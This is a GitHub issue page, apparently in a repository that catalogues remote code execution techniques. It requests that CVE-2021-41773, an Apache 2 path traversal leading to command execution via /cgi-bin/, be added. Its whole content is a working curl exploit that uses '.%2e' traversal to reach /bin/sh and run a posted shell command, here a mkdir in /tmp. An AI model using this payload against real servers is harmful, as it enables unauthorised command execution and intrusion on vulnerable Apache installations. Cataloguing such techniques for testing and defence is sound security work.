Skip to content

[add-request] CVE-2021-41773 - Apache2 Path Trasversal (.%2e) to RCE through /cgi-bin/ #10

New issue
New issue
Open
Open
[add-request] CVE-2021-41773 - Apache2 Path Trasversal (.%2e) to RCE through /cgi-bin/#10
Assignees
p0dalirius
Labels
add-requestRequest a new RCE technique
@wlayzz

Description

@wlayzz
wlayzz
opened on Jun 26, 2022

Adding rce technique on apache2, payload:
curl "http://url.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" --data 'echo Content-Type: text/plain; echo; mkdir /tmp/poda/'

Metadata

Metadata

Assignees

Labels

add-requestRequest a new RCE technique

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions